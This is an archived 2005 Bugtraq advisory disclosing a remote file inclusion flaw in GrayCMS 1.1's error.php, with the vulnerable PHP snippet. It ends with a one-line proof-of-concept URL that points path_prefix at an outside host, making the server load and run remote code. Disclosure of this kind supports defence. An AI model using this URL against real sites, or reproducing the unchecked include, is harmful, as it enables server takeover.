lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 26 Apr 2005 11:45:32 -0000 From: Kold <maggik@...a.net> To: bugtraq@...urityfocus.com Subject: GrayCMS php code injection Version: 1.1 Severity: High Vendor: http://gcms.graymur.net/ Vulnerable code is in "code/error.php": <----begin----> ... if (!isset($page)) $page = ''; if (!isset($path_prefix)) $path_prefix = '../'; if (empty($main)) { require $path_prefix.'code/main.dat'; } if (isset($e404) or isset($_GET['e404'])) { ... } if (isset($e403) or isset($_GET['e403'])) { ... } require $path_prefix.'code/blocks.php'; exit; <----end----> PoC: http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/ mail me: maggik <at> gala <dot> net icq: 3316667 greetz to: ghc, 0xdeadbabe, unl0ck & others